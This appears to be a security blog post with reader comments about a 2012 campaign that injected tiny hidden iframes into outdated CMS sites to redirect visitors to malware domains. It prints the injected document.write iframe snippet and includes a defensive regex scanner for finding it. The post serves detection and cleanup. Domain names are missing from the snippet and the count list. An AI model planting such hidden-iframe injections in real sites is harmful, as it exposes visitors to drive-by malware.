New Web Malware Attacks Using .Ru/In.CGI?16

What do an orange roller, a purple beetle, an orange moth, a green pillar, and a green cricket have in common? Not much, but they are all being used as malware domains to distribute .Ru/In.CGI?16, which has been affecting thousands of web sites lately.

This is what is showing up on the compromised sites:

document.write("<iframe src="" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2..

See the domain? This keeps changing many times per day. Here are the domains we detected over the last couple of days, along with the number of sites compromised by them:

849 iframe
821 iframe
772 iframe
529 iframe
430 iframe
198 iframe
172 iframe
162 iframe
145 iframe
91 iframe
90 iframe
30 iframe
23 iframe
10 iframe
62 iframe
59 iframe
52 iframe
52 iframe
48 iframe
46 iframe
.. many more..

Not all of the domains are in the .ru domain range (like and a few others), but the majority are. As for registration dates, most of them are very new domains that are only being used to distribute malware:

person: Private Person
registrar: REGRU-REG-RIPN
created: 2012.07.15
paid-till: 2013.07.15
free-date: 2013.08.15

What happens to someone that visits the hacked site?

When someone visits a compromised site, they get redirected to one of those domains, where a malicious payload is dropped. This payload is detected by only 1 out of 42 antivirus engines (Avast):

How are the sites getting hacked?

We are seeing this malware across all types of sites and hosts, and every site we checked was running outdated software (WordPress, Joomla, vBulletin, or the good old TimThumb script). So, if you own a web site, make sure that it is always updated. If you have any questions, let us know.
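A defender-side scanner for this injection pattern, added here as an example and not code from the original post: it looks for document.write()'d iframes with a tiny width/height (the 2x2 frame shown above), extracts the src domain, and tallies how many files point at each domain, producing the same kind of per-domain count as the list above. The file contents and host names are constructed placeholders, not real indicators.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# A document.write() call that emits an <iframe ...> tag; the attribute text
# inside the tag is captured for parsing. Either quote style is accepted.
IFRAME_WRITE = re.compile(
    r"""document\.write\(\s*["']\s*<iframe\b([^>]*)>""", re.IGNORECASE)
# One attribute such as src="..." or width='2'.
ATTR = re.compile(r"""(\w+)\s*=\s*(["'])(.*?)\2""", re.IGNORECASE | re.DOTALL)

def find_injected_iframes(text, max_px=10):
    """Return a record for each document.write'd iframe sized max_px or smaller."""
    hits = []
    for m in IFRAME_WRITE.finditer(text):
        attrs = {k.lower(): v for k, _, v in ATTR.findall(m.group(1))}
        try:
            w = int(attrs.get("width", "0").rstrip("px"))
            h = int(attrs.get("height", "0").rstrip("px"))
        except ValueError:
            continue  # non-numeric size: not the pattern we are hunting
        if w > max_px or h > max_px:
            continue  # a normally sized iframe, e.g. a legitimate embed
        src = attrs.get("src", "")
        hits.append({"src": src, "domain": urlparse(src).hostname or "",
                     "width": w, "height": h})
    return hits

def tally_domains(files):
    """Count, per iframe domain, how many files carry the injection."""
    counts = Counter()
    for text in files.values():
        for domain in {h["domain"] for h in find_injected_iframes(text)}:
            counts[domain] += 1
    return counts

# Constructed sample files; the hosts are placeholders, not real indicators.
SAMPLE_FILES = {
    "site-a/index.html": """document.write('<iframe src="http://placeholder-one.example/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');""",
    "site-b/media/system/js/modal.js": """document.write('<iframe src="http://placeholder-one.example/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');""",
    "site-c/plugins/system/mtupgrade/mootools.js": """document.write('<iframe src="https://video.example/embed/1" width="640" height="360"></iframe>');
document.write('<iframe src="http://placeholder-two.example/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');""",
}

if __name__ == "__main__":
    for domain, n in tally_domains(SAMPLE_FILES).most_common():
        print(f"{n} iframe {domain}")
```

Run it over a site's HTML and JS files (the Joomla paths listed in the comments below are typical locations) and any domain with a non-zero count is a candidate for cleanup and blocking.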

      1. Hi, I did the update and reinstalled the theme, but I have been hit by the malware for the third time... what do I do!

    1. I had several sites hacked on 18th July.

      I used the excellent Firebug addon to Firefox to examine the html and the scripts being run.

      On one site I had to clean 6 javascript files that were infected.

      In my case (Joomla sites), I believe it was due to an infection in mootools which is used by many other modules plugins and components.

      The files that were infected were:

      /media/system/js/modal.js
      /components/com_k2/js/k2.js
      /modules/mod_roktabs/tmpl/roktabs_nt1_2.js
      /modules/mod_jw_sir/mod_jw_sir/mod_jw_sir.js
      /plugins/system/mtupgrade/mootools.js

      Hope this helps some others

      Cheers
      Mike Paterson

  1. I have 4 websites infected, 3 PrestaShop and 1 WordPress. What can I do? Please help

  2. It seems to be a security problem of the server administration software Plesk (by Parallels). Have a look there …
